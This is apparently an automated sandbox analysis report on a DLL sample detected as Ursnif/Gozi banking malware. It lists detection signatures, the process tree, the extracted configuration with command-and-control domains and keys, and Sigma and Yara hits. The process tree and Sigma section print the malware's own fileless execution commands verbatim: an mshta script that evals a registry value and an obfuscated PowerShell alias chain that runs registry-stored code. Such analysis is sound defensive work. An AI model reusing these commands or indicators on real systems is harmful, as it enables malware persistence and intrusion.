Windows Analysis Report 61b85f75e6a7c.dll

Overview

General Information

Sample Name: 61b85f75e6a7c.dll
Analysis ID: 539453
MD5: 26788bdf519813ff2600570a5c8e23d9
SHA1: 44f22a053e84cd7afcf34a4fa19dbf512c8a624d
SHA256: 25f74513f1f0a72453bf096337daba7268bf77371f7fc210f56672f52b7b3af1
Tags: brt dll exe gozi isfb ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
PE file has a writeable .text section
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6132 cmdline: loaddll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 7004 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7056 cmdline: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 160 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • regsvr32.exe (PID: 7016 cmdline: regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 5952 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 7084 cmdline: rundll32.exe C:\Users\user\Desktop\61b85f75e6a7c.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 5832 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • control.exe (PID: 5116 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 2528 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6496 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 2596 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1472 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6428 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 3688 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6312 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 5724 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4904 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4928 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, Rule: GoziRule, Description: Win32.Gozi, Author: CCN-CERT, Strings:
  • 0xff0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 6F 00 75 00 72 00 6E 00 61 00 6C 00 00 00 4F 50 45 52 41 2E 45 58 45 00

Sigma Overview

System Summary:

Sigma detected: MSHTA Spawning Windows Shell
Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2596, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 6448
Sigma detected: Suspicious Call by Ordinal
Source: Process started, Author: Florian Roth, Data: Command: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7004, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1, ProcessId: 7056
Sigma detected: Mshta Spawning Windows Shell
Source: Process started, Author: Florian Roth, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2596, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 6448
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5784, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline, ProcessId: 6620
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2596, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 6448
Sigma detected: T1086 PowerShell Execution
Source: Pipe created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: PipeName: \PSHost.132839797066077040.6448.DefaultAppDomain.powershell

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000005.00000002.671518506.0000000002E10000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Machine Learning detection for sample
Source: 61b85f75e6a7c.dll, Joe Sandbox ML: detected
Source: 61b85f75e6a7c.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown, HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49812 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49813 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49816 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49817 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49819 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49820 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49821 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49822 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49825 version: TLS 1.2
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_0102D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_0102D1A3
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_010259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,0_2_010259E6
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_0103F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_0103F63F
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_053DF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_053DF63F
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_053CD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_053CD1A3
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_053C59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_053C59E6
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_04ABF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,4_2_04ABF63F
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_04AAD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,4_2_04AAD1A3
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_04AA59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,4_2_04AA59E6
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_04C3F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,5_2_04C3F63F
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_04C259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,5_2_04C259E6
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_04C2D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,5_2_04C2D1A3
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_0103E230 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_0103E230

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe, Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\regsvr32.exe, Network Connect: 3.20.161.64 187
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 79.110.52.144 187
Source: C:\Windows\SysWOW64\regsvr32.exe, Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 18.219.227.107 187
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 3.12.124.139 187
Source: Joe Sandbox View, ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View, ASN Name: V4ESCROW-ASRO V4ESCROW-ASRO
Source: Joe Sandbox View, ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View, JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
